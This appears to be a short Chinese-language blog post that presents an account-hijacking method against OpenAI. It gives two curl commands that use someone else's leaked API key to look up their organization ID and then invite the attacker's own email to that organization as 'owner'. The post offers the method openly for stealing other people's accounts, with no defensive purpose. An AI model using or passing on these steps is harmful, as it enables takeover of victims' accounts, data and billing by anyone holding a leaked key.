OpenAI通过OpenAI_Key转组织盗号

这是openAI的一个漏洞,通过别人的AI_Key来把他的账号转到你名下

OpenAI_Key="sk-xxxx"

#第一步 通过sk 获取到所属账号 organizations ID

curl "https://api.openai.com/v1/organizations" -H "Content-Type: application/json"  -H "Authorization: Bearer $OpenAI_Key"

OpenAI_Organizations_ID="org-xxx" (上一步的输出内容包含该信息)

#第二步 将自己已经注册过openai的账号邮箱加入即可

curl -X POST "https://api.openai.com/v1/organizations/$OpenAI_Organizations_ID/invite_request" -H "Content-Type: application/json"  -H "Authorization: Bearer $OpenAI_Key"  -d '{ "emails": [ "你的邮箱" ], "role": "owner" }'

 

阅读剩余
THE END